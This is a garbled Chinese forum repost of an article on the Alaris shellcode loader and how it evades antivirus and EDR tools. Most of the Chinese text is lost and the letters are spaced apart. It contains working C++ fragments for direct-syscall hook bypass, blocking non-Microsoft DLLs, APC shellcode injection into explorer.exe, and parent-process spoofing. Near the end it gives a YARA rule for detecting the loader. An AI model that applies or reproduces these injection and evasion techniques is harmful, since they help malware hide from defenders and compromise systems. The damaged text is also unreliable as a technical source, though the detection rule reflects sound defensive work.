搜索

[17928] 2021-05-23_ALaris免杀shellcodeloader技术原理.

文档创建者:s7ckTeam
浏览次数:40
最后更新:2025-01-18
2021-05-23_ALaris免杀shellcodeloader技术原理.md A L a r i s   s h e l l c o d e   l o a d e r . m d   w 8 a y   H a c k i n g   2 0 2 1 - 0 5 - 2 3 A L a r i s   s h e l l c o d e   l o a d e r   G i t H u b h t t p s : / / g i t h u b . c o m / c r i b d r a g g 3 r / A l a r i s B u i l d 3 0 v t 0 G i t H u b W i n d o w s V i s t a P a t c h G u a r d P G S S D T G D T I D T M S R P G W i n d o w s S S D T   P G P G W i n d o w s h o o k W i n d o w s 线 d l l / e x e n t o s k r n l . e x e n d i s . s y s h a l . d l l
i m g M i c r o s o f t 使     I   /   O N t D e v i c e I o C o n t r o l F i l e     h t t p s : / / d o c s . m i c r o s o f t . c o m / e n - u s / w i n d o w s - h a r d w a r e / d r i v e r s / i f s / f i l t e r - m a n a g e r - c o n c e p t s           h t t p s : / / d o c s . m i c r o s o f t . c o m / e n - u s / w i n d o w s / w i n 3 2 / a p i / w i n t e r n l / n f - w i n t e r n l - n t d e v i c e i o c o n t r o l f i l e N t D e v i c e I o C o n t r o l F i l e           M i c r o s o f t 使 h o o k h t t p s : / / w w w . m d s e c . c o . u k / 2 0 2 0 / 1 2 / b y p a s s i n g - u s e r - m o d e - h o o k s - a n d - d i r e c t - i n v o c a t i o n - o f - s y s t e m - c a l l s - f o r - r e d - t e a m s / D L L M i c r o s o f t   D l l h o o k / /   D i s a l l o w   n o n - m i c r o s o f t   s i g n e d   D L L ' s   f r o m   h o o k i n g / i n j e c t i n g   i n t o   o u r   C r e a t e P r o c e s s ( ) : I n i t i a l i z e P r o c T h r e a d A t t r i b u t e L i s t ( s i . l p A t t r i b u t e L i s t ,   2 ,   0 ,   & s i z e ) ; D W O R D 6 4   p o l i c y   =   P R O C E S S _ C R E A T I O N _ M I T I G A T I O N _ P O L I C Y _ B L O C K _ N O N _ M I C R O S O F T _ B I N A R I E S _ A L W A Y S _ O N ; U p d a t e P r o c T h r e a d A t t r i b u t e ( s i . l p A t t r i b u t e L i s t ,   0 ,   P R O C _ T H R E A D _ A T T R I B U T E _ M I T I G A T I O N _ P O L I C Y ,   & p o l i c y ,   s i z e o f ( p o l i c y ) ,  
x 8 6   S y s c a l l 使   h t t p s : / / g i t h u b . c o m / j t h u r a i s a m y / S y s W h i s p e r s 2   x 6 4 P E B n t d l l n t d l l s y s c a l l h t t p s : / / w w w . m d s e c . c o . u k / 2 0 2 0 / 1 2 / b y p a s s i n g - u s e r - m o d e - h o o k s - a n d - d i r e c t - i n v o c a t i o n - o f - s y s t e m - c a l l s - f o r - r e d - t e a m s / h t t p s : / / s e v r o s e c u r i t y . c o m / 2 0 2 0 / 0 4 / 0 8 / p r o c e s s - i n j e c t i o n - p a r t - 1 - c r e a t e r e m o t e t h r e a d / 使 s h e l l c o d e 使 S y s m o n   h o o k i n g S Y S T E M S y s m o n w i n d o w s E v e n t   I D   1 :   P r o c e s s   c r e a t i o n E v e n t   I D   2 :   A   p r o c e s s   c h a n g e d   a   f i l e   c r e a t i o n   t i m e E v e n t   I D   3 :   N e t w o r k   c o n n e c t i o n E v e n t   I D   4 :   S y s m o n   s e r v i c e   s t a t e   c h a n g e d E v e n t   I D   5 :   P r o c e s s   t e r m i n a t e d E v e n t   I D   6 :   D r i v e r   l o a d e d E v e n t   I D   7 :   I m a g e   l o a d e d E v e n t   I D   8 :   C r e a t e R e m o t e T h r e a d E v e n t   I D   9 :   R a w A c c e s s R e a d E v e n t   I D   1 0 :   P r o c e s s A c c e s s / /   D i s a l l o w   n o n - M S F T   s i g n e d   D L L ' s   f r o m   i n j e c t i n g P R O C E S S _ M I T I G A T I O N _ B I N A R Y _ S I G N A T U R E _ P O L I C Y   s p   =   { } ; s p . M i c r o s o f t S i g n e d O n l y   =   1 ; S e t P r o c e s s M i t i g a t i o n P o l i c y ( P r o c e s s S i g n a t u r e P o l i c y ,   & s p ,   s i z e o f ( s p ) ) ; s y s c a l l C r e a t e R e m o t e T h r e a d s y s c a l l S y s m o n
E v e n t   I D   1 1 :   F i l e C r e a t e E v e n t   I D   1 2 :   R e g i s t r y E v e n t   ( O b j e c t   c r e a t e   a n d   d e l e t e ) E v e n t   I D   1 3 :   R e g i s t r y E v e n t   ( V a l u e   S e t ) E v e n t   I D   1 4 :   R e g i s t r y E v e n t   ( K e y   a n d   V a l u e   R e n a m e ) E v e n t   I D   1 5 :   F i l e C r e a t e S t r e a m H a s h E v e n t   I D   2 5 5 :   E r r o r h t t p s : / / t e c h n e t . m i c r o s o f t . c o m / e n - u s / s y s i n t e r n a l s / s y s m o n C r e a t e R e m o t e T h r e a d E v e n t   I D   8 使 S y s m o n 线 线 线 s h e l l c o d e 线 访 A P C A P C Q u e u e U s e r A P C Q u e u e U s e r A P C e x p l o r e r . e x e
e x p l o r e r 线 线 2 0 - 5 0 s h e l l c o d e 2 0 - 5 0 s h e l l c o d e 线 5 Q u e u e U s e r A P C - H A N D L E   s n a p s h o t   =   C r e a t e T o o l h e l p 3 2 S n a p s h o t ( T H 3 2 C S _ S N A P P R O C E S S   |   T H 3 2 C S _ S N A P T H R E A D ,   0 ) ;   P R O C E S S E N T R Y 3 2   p r o c e s s E n t r y   =   {   s i z e o f ( P R O C E S S E N T R Y 3 2 )   } ;   i f   ( P r o c e s s 3 2 F i r s t ( s n a p s h o t ,   & p r o c e s s E n t r y ) )   {     w h i l e   ( _ w c s i c m p ( p r o c e s s E n t r y . s z E x e F i l e ,   L " e x p l o r e r . e x e " )   ! =   0 )     {       P r o c e s s 3 2 N e x t ( s n a p s h o t ,   & p r o c e s s E n t r y ) ;     }   }   H A N D L E   v i c t i m P r o c e s s   =   O p e n P r o c e s s ( P R O C E S S _ A L L _ A C C E S S ,   0 ,   p r o c e s s E n t r y . t h 3 2 P r o c e s s I D ) ;   L P V O I D   s h e l l A d d r e s s   =   V i r t u a l A l l o c E x ( v i c t i m P r o c e s s ,   N U L L ,   s h e l l c o d e S i z e ,   M E M _ C O M M I T ,   P A G E _ E X E C U T E _ R E A D W R I T E ) ;   / / 3 . E x e c u t e   s h e l l c o d e   P T H R E A D _ S T A R T _ R O U T I N E   a p c R o u t i n e   =   ( P T H R E A D _ S T A R T _ R O U T I N E ) s h e l l A d d r e s s ;   W r i t e P r o c e s s M e m o r y ( v i c t i m P r o c e s s ,   s h e l l A d d r e s s ,   s h e l l c o d e ,   s h e l l c o d e S i z e ,   N U L L ) ;   T H R E A D E N T R Y 3 2   t h r e a d E n t r y   =   {   s i z e o f ( T H R E A D E N T R Y 3 2 )   } ;   s t d : : v e c t o r < D W O R D >   t h r e a d I d s ;   i f   ( T h r e a d 3 2 F i r s t ( s n a p s h o t ,   & t h r e a d E n t r y ) )   {     d o   {       i f   ( t h r e a d E n t r y . t h 3 2 O w n e r P r o c e s s I D   = =   p r o c e s s E n t r y . t h 3 2 P r o c e s s I D )       {         t h r e a d I d s . p u s h _ b a c k ( t h r e a d E n t r y . t h 3 2 T h r e a d I D ) ;       }     }   w h i l e   ( T h r e a d 3 2 N e x t ( s n a p s h o t ,   & t h r e a d E n t r y ) ) ;   }   f o r   ( D W O R D   t h r e a d I d   :   t h r e a d I d s )   {     H A N D L E   t h r e a d H a n d l e   =   O p e n T h r e a d ( T H R E A D _ A L L _ A C C E S S ,   T R U E ,   t h r e a d I d ) ;     Q u e u e U s e r A P C ( ( P A P C F U N C ) a p c R o u t i n e ,   t h r e a d H a n d l e ,   N U L L ) ;     S l e e p ( 1 0 0 0   *   2 ) ;   }   r e t u r n   0 ;
5 线 3 线 6 0 - 7 0 线 使 s h e l l c o d e 使   A E S -   C B C   2 5 6 s h e l l c o d e i v 使 s t a g e   p a y l o a d p a y l o a d A E S E D R P P I D A l a r i s s h e l l c o d e p p i d s h e l l c o d e s h e l l c o d e 1 0 s . . . . x F C x E 8 x F C x 4 8 l o a d e r . e x e   - >   m o b s y n c . e x e e x p l o r e r . e x e   - >   m o b s y n c . e x e / /   T h i s   i s   j u s t   d i r e c t l y   s t o l e n   f r o m   i r e d . t e a m D W O R D   g e t _ P P I D ( )   {         H A N D L E   s n a p s h o t   =   C r e a t e T o o l h e l p 3 2 S n a p s h o t ( T H 3 2 C S _ S N A P P R O C E S S ,   0 ) ;         P R O C E S S E N T R Y 3 2   p r o c e s s   =   {   0   } ;         p r o c e s s . d w S i z e   =   s i z e o f ( p r o c e s s ) ;         i f   ( P r o c e s s 3 2 F i r s t ( s n a p s h o t ,   & p r o c e s s ) )   {                 d o   {                         i f   ( ! w c s c m p ( p r o c e s s . s z E x e F i l e ,   L " e x p l o r e r . e x e " ) )                                 b r e a k ;                 }   w h i l e   ( P r o c e s s 3 2 N e x t ( s n a p s h o t ,   & p r o c e s s ) ) ;         }         C l o s e H a n d l e ( s n a p s h o t ) ;         r e t u r n   p r o c e s s . t h 3 2 P r o c e s s I D ; } / /   M a s k   t h e   P P I D   t o   t h a t   o f   e x p l o r e r . e x e H A N D L E   e x p l o r e r _ h a n d l e   =   O p e n P r o c e s s ( P R O C E S S _ A L L _ A C C E S S ,   f a l s e ,   g e t _ P P I D ( ) ) ; U p d a t e P r o c T h r e a d A t t r i b u t e ( s i . l p A t t r i b u t e L i s t ,   0 ,   P R O C _ T H R E A D _ A T T R I B U T E _ P A R E N T _ P R O C E S S ,   & e x p l o r e r _ h a n d l e ,   s i z e o f / /   O v e r w r i t e   s h e l l c o d e   w i t h   n u l l   b y t e s S l e e p ( 1 0 0 0 0 ) ; u i n t 8 _ t   o v e r w r i t e [ 5 0 0 ] ; N t W r i t e V i r t u a l M e m o r y ( h P r o c e s s ,   m e m ,   o v e r w r i t e ,   s i z e o f ( o v e r w r i t e ) ,   0 ) ;
s h e l l c o d e e i p -   = r e a d m e D O S D O S g i t h u b y a r a h t t p s : / / s e v r o s e c u r i t y . c o m / 2 0 2 0 / 1 0 / 1 4 / a l a r i s - a - p r o t e c t i v e - l o a d e r / h t t p s : / / g i t h u b . c o m / j t h u r a i s a m y / S y s W h i s p e r s 2 h t t p s : / / w w w . m d s e c . c o . u k / 2 0 2 0 / 1 2 / b y p a s s i n g - u s e r - m o d e - h o o k s - a n d - d i r e c t - i n v o c a t i o n - o f - s y s t e m - c a l l s - f o r - r e d - t e a m s / S h o w W i n d o w ( G e t C o n s o l e W i n d o w ( ) ,   S W _ H I D E ) ; i m p o r t   " p e " r u l e   a l a r i s   {         m e t a :                 d e s c r i p t i o n   =   " F i n d   a l l   s t o c k   M e l a n g e   L o a d e r s "                 a u t h o r   =   " J o s h u a   F a u s t "                 d a t e   =   " 2 0 2 0 / 1 0 / 1 4 "         s t r i n g s :                 $   =   " [ ! ]   E R R O R "   f u l l w o r d   a s c i i   w i d e   $   =   " C : W i n d o w s S y s t e m 3 2 m o b s y n c . e x e "   f u l l w o r d   w i d e                 $   =   " g e x p l o r e r . e x e "   f u l l w o r d   w i d e                 $   =   {   7 0   7 6   2 0   f 2   3 f   4 c   4 c   1 0   4 5   f b   5 0   9 3   d 8   d 1   c 9   f b   6 c   3 0   4 5   8 8   d d   b 2   f 4   a f   9 c   1 c   2 2   1 3   2 6   6 7   2 4                 $   =   {   8 9   5 4   7 f   6 4   c 0   c e   3 a   4 4   f 0   e e   a f   ? ?   a 8   d c   6 b   6 5   }         c o n d i t i o n :             p e . i s _ p e   a n d   3   o f   t h e m }
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理